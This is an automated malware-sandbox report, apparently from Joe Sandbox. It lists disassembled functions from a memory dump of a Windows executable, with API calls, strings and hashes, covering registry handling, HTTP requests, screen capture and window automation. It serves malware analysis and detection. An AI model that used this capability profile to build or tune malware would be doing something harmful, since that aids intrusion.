EXISTS, xrefs: 01060B7C, 01060B97

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 20da5db7dd9c3565ff92320b3d7dc691928e7c7ba8647c1575e3d53f94252eb4
Instruction ID: a0a25b00d1f9e5556df84346574735ccf133f36db106403c23cebda246eae950
Opcode Fuzzy Hash: 20da5db7dd9c3565ff92320b3d7dc691928e7c7ba8647c1575e3d53f94252eb4
Instruction Fuzzy Hash: 54E1AF322483018FCB14EF29C85096EB7E6BF98354B048A9DF8D69B366D735ED45CB81

Function 0105C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0105B6AE,?,?), ref: 0105C9B5
_wcslen.LIBCMT ref: 0105C9F1
_wcslen.LIBCMT ref: 0105CA68
_wcslen.LIBCMT ref: 0105CA9E
_wcslen.LIBCMT ref: 0105CAF9
_wcslen.LIBCMT ref: 0105CB2F
_wcslen.LIBCMT ref: 0105CB7F

Strings

HKCR, xrefs: 0105CB29, 0105CB2E
HKU, xrefs: 0105CBF0
HKEY_CURRENT_CONFIG, xrefs: 0105CB79, 0105CB7E
HKEY_CLASSES_ROOT, xrefs: 0105CAF3, 0105CAF8
HKCU, xrefs: 0105CBCE
HKEY_LOCAL_MACHINE, xrefs: 0105CA62, 0105CA67
HKEY_CURRENT_USER, xrefs: 0105CBBD
HKCC, xrefs: 0105CBAC
HKEY_USERS, xrefs: 0105CBDF
HKLM, xrefs: 0105CA98, 0105CA9D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 1c6bb14ccbd5e4042b39d3dde9fab7c3a8aae7d6cb4af9f7c7dc04268749db2d
Instruction ID: 1fb0249d2e73d02096c703647264d4d3a506943e1761f9eadcc8db54e42e8096
Opcode Fuzzy Hash: 1c6bb14ccbd5e4042b39d3dde9fab7c3a8aae7d6cb4af9f7c7dc04268749db2d
Instruction Fuzzy Hash: 4871053360022A8BEFA1DE6CCE505BF3BD9AF50654F140168FCD297286E635CD44E7A0

Function 0106833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0106835A
_wcslen.LIBCMT ref: 0106836E
_wcslen.LIBCMT ref: 01068391
_wcslen.LIBCMT ref: 010683B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 010683F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0106361A,?), ref: 0106844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01068487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 010684CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01068501
FreeLibrary.KERNEL32(?), ref: 0106850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0106851D
DestroyIcon.USER32(?), ref: 0106852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01068549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01068555

Strings

.icl, xrefs: 01068368
.dll, xrefs: 010683AB
.exe, xrefs: 01068388

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 94b7ae3f8f264c1053f4565b0ffb5bc597a0200c227bba9868062ac86299d2fd
Instruction ID: 44eb02f3ced6b39efe73b25b60a81a4ef62f1dd783f3b0ea91d8aad2b5696b58
Opcode Fuzzy Hash: 94b7ae3f8f264c1053f4565b0ffb5bc597a0200c227bba9868062ac86299d2fd
Instruction Fuzzy Hash: CB61E271540319BAEB24DF64CC41BBF77ACBF08710F10864AF995DA1D1DBB9AA80D7A0

Function 00FF00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FF00C6

Part of subcall function 00FF00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(010A070C,00000FA0,AAB89C93,?,?,?,?,010123B3,000000FF), ref: 00FF011C
Part of subcall function 00FF00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,010123B3,000000FF), ref: 00FF0127
Part of subcall function 00FF00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,010123B3,000000FF), ref: 00FF0138
Part of subcall function 00FF00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FF014E
Part of subcall function 00FF00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FF015C
Part of subcall function 00FF00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FF016A
Part of subcall function 00FF00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FF0195
Part of subcall function 00FF00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FF01A0

___scrt_fastfail.LIBCMT ref: 00FF00E7

Part of subcall function 00FF00A3: __onexit.LIBCMT ref: 00FF00A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FF0122
InitializeConditionVariable, xrefs: 00FF0148
kernel32.dll, xrefs: 00FF0133
WakeAllConditionVariable, xrefs: 00FF0162
SleepConditionVariableCS, xrefs: 00FF0154

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: eae3c32527f0dbe6551159c1c393ca96b6560d3ea3fdaba258cfade685f6a03a
Instruction ID: 4c5f070fd86c93ff83d2e660dae58817f1397c531e44ce5170d22ef8fd53fe0f
Opcode Fuzzy Hash: eae3c32527f0dbe6551159c1c393ca96b6560d3ea3fdaba258cfade685f6a03a
Instruction Fuzzy Hash: 26213E32E45719ABE7306BA5AD05B7E3799EF05B60F00012AF9C1AB265DF799C009B50

Function 010444C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0106CC08), ref: 01044527
_wcslen.LIBCMT ref: 0104453B
_wcslen.LIBCMT ref: 01044599
_wcslen.LIBCMT ref: 010445F4
_wcslen.LIBCMT ref: 0104463F
_wcslen.LIBCMT ref: 010446A7

Part of subcall function 00FEF9F2: _wcslen.LIBCMT ref: 00FEF9FD

GetDriveTypeW.KERNEL32(?,01096BF0,00000061), ref: 01044743

Strings

fixed, xrefs: 01044635, 0104463A
all, xrefs: 01044531, 01044536
cdrom, xrefs: 0104458F, 01044594
ramdisk, xrefs: 010446F1
network, xrefs: 0104469D, 010446A2
removable, xrefs: 010445EA, 010445EF
unknown, xrefs: 01044708

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 373dc7b2df3e4d5f7a4dedbfd6fcc2656b9688c630b6e54a63389acd5afc9642
Instruction ID: 3897bfe768af297ce158af8cb069bb4f11746d9a6f5dfe128e48b595aade8441
Opcode Fuzzy Hash: 373dc7b2df3e4d5f7a4dedbfd6fcc2656b9688c630b6e54a63389acd5afc9642
Instruction Fuzzy Hash: 35B1FEB16083029BC710DF28C8D0A6EB7E5BF99760F44496DF5D6C7292E734D845CBA2

Function 01066CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 01066DEB

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01066E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 01066E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01066E94
DestroyWindow.USER32(?), ref: 01066EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FD0000,00000000), ref: 01066EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01066EFD
GetDesktopWindow.USER32 ref: 01066F16
GetWindowRect.USER32(00000000), ref: 01066F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01066F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01066F4D

Part of subcall function 00FE9944: GetWindowLongW.USER32(?,000000EB), ref: 00FE9952

Strings

tooltips_class32, xrefs: 01066E58, 01066EDD
0, xrefs: 01066D98

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 425636902746d9bb75210c8a1f41bcc4c1ed97d79adbc6c06adcb4f216309c0d
Instruction ID: 7dc5190c4b6550edc25dd9f1593d53c40e546bfd0c9db9639aeb50c85c65af19
Opcode Fuzzy Hash: 425636902746d9bb75210c8a1f41bcc4c1ed97d79adbc6c06adcb4f216309c0d
Instruction Fuzzy Hash: B8717670104244AFEB21CF1CC844EAABBE9FB89304F84045EFADA87261C776E906DB15

Function 0104C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0104C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0104C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0104C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0104C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0104C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0104C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0104C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0104C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0104C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0104C5F0
InternetCloseHandle.WININET(00000000), ref: 0104C5FB

Strings

, xrefs: 0104C575

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 133f62c79c8051774763b1ff7d9784254f43eef04b1090390cdbee67f52394bf
Instruction ID: 2c5e97e0db1465ef6c33940033df444e73322b13ffa59dcbfa0f3245b9d19c04
Opcode Fuzzy Hash: 133f62c79c8051774763b1ff7d9784254f43eef04b1090390cdbee67f52394bf
Instruction Fuzzy Hash: DF513FB1501605BFFB219F65CA88AAF7BFCFF08754F008429F9C696150DB39E9449BA0

Function 0106856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 01068592
GetFileSize.KERNEL32(00000000,00000000), ref: 010685A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 010685AD
CloseHandle.KERNEL32(00000000), ref: 010685BA
GlobalLock.KERNEL32(00000000), ref: 010685C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 010685D7
GlobalUnlock.KERNEL32(00000000), ref: 010685E0
CloseHandle.KERNEL32(00000000), ref: 010685E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 010685F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,0106FC38,?), ref: 01068611
GlobalFree.KERNEL32(00000000), ref: 01068621
GetObjectW.GDI32(?,00000018,000000FF), ref: 01068641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 01068671
DeleteObject.GDI32(00000000), ref: 01068699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 010686AF

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 2afcfd496e45bcedcbbc5e9e2a9571e3039aa916ea6a9778ef31fd26513e416c
Instruction ID: 381731c07dbf9b1b6bd5ef29cf878481826be3b9ae0c107988d71b44e5bafb2e
Opcode Fuzzy Hash: 2afcfd496e45bcedcbbc5e9e2a9571e3039aa916ea6a9778ef31fd26513e416c
Instruction Fuzzy Hash: DF412B75600205AFEB219FA9CD48EAE7BBCEF89711F008059F989EB264D7359901CB20

Function 0105255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 010525D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 010525E8
CreateCompatibleDC.GDI32(?), ref: 010525F4
SelectObject.GDI32(00000000,?), ref: 01052601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0105266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 010526AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 010526D0
SelectObject.GDI32(?,?), ref: 010526D8
DeleteObject.GDI32(?), ref: 010526E1
DeleteDC.GDI32(?), ref: 010526E8
ReleaseDC.USER32(00000000,?), ref: 010526F3

Strings

(, xrefs: 0105268D

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5c5fa9957564275888464407d02e53b81ecd97a5dea2a3e5562fe48c7580564e
Instruction ID: 340f1eca7a52e99a22fad7b9326b7bdb71da08aa298bf5e0b8b468b35ab1a18a
Opcode Fuzzy Hash: 5c5fa9957564275888464407d02e53b81ecd97a5dea2a3e5562fe48c7580564e
Instruction Fuzzy Hash: DA611375D00209EFDF15CFA8C984AAEBBF5FF48310F20852AE995A7250D775A940CFA0

Function 01034954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 01034994
GetWindowTextW.USER32(?,?,00000400), ref: 010349DA
_wcslen.LIBCMT ref: 010349EB
CharUpperBuffW.USER32(?,00000000), ref: 010349F7
_wcsstr.LIBVCRUNTIME ref: 01034A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 01034A64
GetWindowTextW.USER32(?,?,00000400), ref: 01034A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 01034AE6
GetClassNameW.USER32(?,?,00000400), ref: 01034B20
GetWindowRect.USER32(?,?), ref: 01034B8B

Strings

ThumbnailClass, xrefs: 01034A6F, 01034AF1

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 907ff7ef1d06aaa36869c5c7fbe512c484ab155caa90cc8e81bc720c9b713c01
Instruction ID: fff677af2c5f0cf1fdda20fef021db7c635eb97b86451075a83163b9b47b721f
Opcode Fuzzy Hash: 907ff7ef1d06aaa36869c5c7fbe512c484ab155caa90cc8e81bc720c9b713c01
Instruction Fuzzy Hash: 1791B2311042099FEB59DE18C980BAA7BECFF84314F0484AAFEC5DA196DB34E945CB61

Function 0105CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0105CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0105CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0105CD48

Part of subcall function 0105CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0105CCAA
Part of subcall function 0105CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0105CCBD
Part of subcall function 0105CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0105CCCF
Part of subcall function 0105CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0105CD05
Part of subcall function 0105CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0105CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0105CCF3

Strings

RegDeleteKeyExW, xrefs: 0105CCC9
advapi32.dll, xrefs: 0105CCB8

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 69cb81728a295e0f50b27ee51d6f368a22280173c442c3e26add7315b30d1251
Instruction ID: f5e96165b0138220b36fd5be6cf96240fc96f36f4a1a2f70d5875dbaea50a758
Opcode Fuzzy Hash: 69cb81728a295e0f50b27ee51d6f368a22280173c442c3e26add7315b30d1251
Instruction Fuzzy Hash: 0B318071901229BBFB719A95DD88EFFBFBCEF06640F0001A5F981E6104D6749A459BB0

Function 0103E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0103E6B4

Part of subcall function 00FEE551: timeGetTime.WINMM(?,?,0103E6D4), ref: 00FEE555

Sleep.KERNEL32(0000000A), ref: 0103E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0103E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0103E727
SetActiveWindow.USER32 ref: 0103E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0103E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0103E773
Sleep.KERNEL32(000000FA), ref: 0103E77E
IsWindow.USER32 ref: 0103E78A
EndDialog.USER32(00000000), ref: 0103E79B

Strings

BUTTON, xrefs: 0103E719

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_fd0000_8ed1a1ded0.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 159acb4b7854506dc50eb0f415f04db544434a07a6e4dab3a7499d643ed290df
Instruction ID: 73bbbab3a8739232e80f8e073159035e43f0ed4a1ba82a423c30b190694cab99
Opcode Fuzzy Hash: 159acb4b7854506dc50eb0f415f04db544434a07a6e4dab3a7499d643ed290df
Instruction Fuzzy Hash: CE21C670240601AFFB315F24EDD8A293B6DF788348F400635F5D182655DBBBAC109B24

Function 0103E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0103EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0103EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0103EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0103EAA7

Strings

play PlayMe wait, xrefs: 0103EA91
close PlayMe, xrefs: 0103EA6E, 0103EA9B
alias PlayMe, xrefs: 0103EA36
status PlayMe mode, xrefs: 0103EA58
open , xrefs: 0103EA0C
play PlayMe, xrefs: 0103EAA2

Memory Dump Source

Source File: 00000009.00000002.2556344833.0000000000FD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000009.00000002.2556037855.0000000000FD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.000000000106C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2557547644.0000000001092000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558036186.000000000109C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000009.00000002.2558270951.00000000010A4000.00000002.00000001.01000000.0000000B.sdmpDownload File

